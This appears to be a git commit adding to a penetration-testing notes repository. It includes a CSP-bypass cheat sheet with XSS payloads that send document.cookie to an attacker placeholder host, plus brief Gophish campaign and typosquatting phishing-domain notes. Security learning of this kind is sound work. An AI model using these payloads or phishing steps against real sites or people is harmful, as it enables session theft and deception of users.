bump

2021-11-12 00:48:54 +01:00 · 2021-11-12 00:48:54 +01:00 · c328c604dd
parent 9b31906c44
commit c328c604dd
5 changed files with 73 additions and 0 deletions
--- a/.gitmodules
+++ b/.gitmodules
@ -67,3 +67,6 @@
 [submodule "forensics/volatility"]
 	path = forensics/volatility
 	url = https://github.com/volatilityfoundation/volatility.git
+[submodule "exploit/web/content_security_policy/JSONBee"]
+	path = exploit/web/content_security_policy/JSONBee
+	url = https://github.com/zigoo0/JSONBee.git
--- a/exploit/web/content_security_policy/JSONBee
+++ b/exploit/web/content_security_policy/JSONBee
@ -0,0 +1 @@
+Subproject commit 1a518ddf695ae3093ff637c5958802715e890d88
--- a/exploit/web/content_security_policy/content_security_policy.md
+++ b/exploit/web/content_security_policy/content_security_policy.md
@ -0,0 +1,52 @@
+# Content Security Policy (CSP)
+
+* Either in HTTP header or inside DOM's HTML 
+* [CSP directives](https://content-security-policy.com/#directive)
+* [CSP evaluator](https://csp-evaluator.withgoogle.com/)
+* [Bypassing csp](https://blog.0daylabs.com/2016/09/09/bypassing-csp/)
+
+## Sources
+* `*` wildcard 
+* `none`
+* `self` for sources delivered through the same protocol
+    * `default-src 'self';` may not load any script
+* `unsafe-inline`
+* `unsafe-eval` 
+* `test.com` loads resources from domain but not subdomains
+* `*.test.com` loads resources from subdomains
+* `data:<content-type>...` critical usage
+* `nonce` loads if nonce is correct. `sha256`, `sha384`, `sha512`
+    * [style hasher](https://report-uri.com/home/hash)
+
+## Usage 
+
+### JSONP
+Find JSONP endpoints through which to use custom callback functions
+* [JSONBee](https://github.com/zigoo0/JSONBee)
+```sh
+"><script+src="https://bebezoo.1688.com/fragment/index.htm?callback=alert(1337)"></script>
+```
+
+### Misconfiguration
+Insert payload into `src` attribute
+
+### Exfiltration
+* [Beeceptor](beeceptor.com)
+* Local webserver
+* `connect-src` while Ajax/XHR requests are enabled
+* Disguising as an `image-src` or `media-src` source
+```html
+<script>(new Image()).src = `https://example.com/${encodeURIComponent(document.cookie)}`</script>
+```
+other payloads
+```sh
+<link id="csp" rel=stylesheet href="" /><script nonce="abcdef">document.getElementById("csp").href="http://<attacker-IP>:8000/" + document.cookie;</script>
+```
+* 
+```sh
+<script src="https://cdnjs.cloudflare.com/ajax/libs/prototype/1.7.3/prototype.min.js" integrity="sha512-C4LuwXQtQOF1iTRy3zwClYLsLgFLlG8nCV5dCxDjPcWsyFelQXzi3efHRjptsOzbHwwnXC3ZU+sWUh1gmxaTBA==" crossorigin="anonymous"></script>
+<script src="https://cdnjs.cloudflare.com/ajax/libs/angular.js/1.8.2/angular.min.js"></script>
+<div ng-app ng-csp>
+{{$on.curry.call().document.location='https://<attacker-IP>/' + $on.curry.call().document.cookie}}
+</div>
+```
--- a/osint/social_engineering/gophish.md
+++ b/osint/social_engineering/gophish.md
@ -0,0 +1,12 @@
+# Gophish
+
+* [Repo](https://github.com/gophish/gophish.git)
+
+## Usage
+
+* Create 
+    * Send profile
+    * Landing page
+    * Email templates
+    * User groups
+    * New Campaign
--- a/osint/social_engineering/phishing_domain.md
+++ b/osint/social_engineering/phishing_domain.md
@ -0,0 +1,5 @@
+# Phishing Domains
+
+* Use an old, unused domain.
+* Typosquatting, register a similar domain.
+* Use similar looking chars from unicode.
				`@ -0,0 +1 @@`
				`Subproject commit 1a518ddf695ae3093ff637c5958802715e890d88`